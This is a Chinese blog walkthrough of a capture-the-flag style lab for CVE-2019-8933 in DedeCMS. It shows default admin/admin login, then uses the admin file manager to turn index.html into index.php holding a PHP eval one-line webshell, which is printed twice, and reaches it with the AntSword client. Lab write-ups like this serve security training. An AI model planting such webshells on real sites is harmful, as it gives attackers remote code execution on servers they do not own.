春秋云境CVE-2019-8933

1.阅读靶场介绍

这里我们能得到的信息就是

将文件名../index.html更改成../index.php应用该漏洞向uploads/目录上传.php文件并执行该文件。

简单来说就是在后台把index.html的文件改为index.php并且修改内容为

<?php @eval($_POST'cmd');?>

然后就可以完成webshell了

2.启动靶场

如下图所示

博主这里是把靶场介绍喂给ai得到的后台路径

直接在路径拼接/dede这个就会跳转到登入页面

如下图所示

账号/密码是admin/admin

进入后台以后我们点击这个文件式管理器

右边有一个index.html我们点击编辑

会出现下述页面

这里要修改一下文件名称和内容

index.php

<?php @eval($_POST'cmd');?>

保存即可

然后访问

出现一片空白的就是对的

下面这个是url

https://eci-2ze1zd9kizhz7f10jpim.cloudeci1.ichunqiu.com/uploads/index.php

最后就是启动中国蚁剑

输入url和木马的密码

我们就可以完成webshell了

这里我们就可以找到flag

感谢您宝贵的时间

喜欢博主的作品可以点赞支持支持哟

相关推荐
m0_7156744314 小时前
智能化+基于行标+场景化 政务数据库审计与风险监测全维度解决方案
网络·数据库·安全·网络安全·政务
山东科恩光电15 小时前
安全触边系统在工业自动化设备中的重要性及应用前景
安全
看浪的路人15 小时前
第8讲:运行时安全与沙箱隔离——Agent 能做什么,不能做什么
安全
云杂项15 小时前
Safety at Scale: A Comprehensive Survey of Large Model and Agent Safety(LLMs章节)
人工智能·安全
终端安全笔记15 小时前
iOS 27 给了租赁一个新工具,但它只认受监督的设备
android·网络·安全·ios
蒲公英eric16 小时前
从旧接口泄露到 OAuth 保护:DVWA API 模块完整漏洞分析教程
web安全·ai·ctf·dvwa·ai安全·api模块
jimmyleeee16 小时前
大模型安全之二十一:构建 AI 安全控制栈:从威胁映射到持续合规的完整指南
人工智能·安全
漫话明说16 小时前
工智能安全描述性综述(2026):基于30份行业报告的梳理
安全·智能体·ai安全
xiaoqiMikko16 小时前
Jetty 又出一条走私(CVE-2026-19203):官方叫升 9.4.64,而 9.4.64 在 Central 上是 404
java·安全
山东科恩光电16 小时前
科恩隐卫-KZS-01:实现注塑机安全生产的智能防护新标准
安全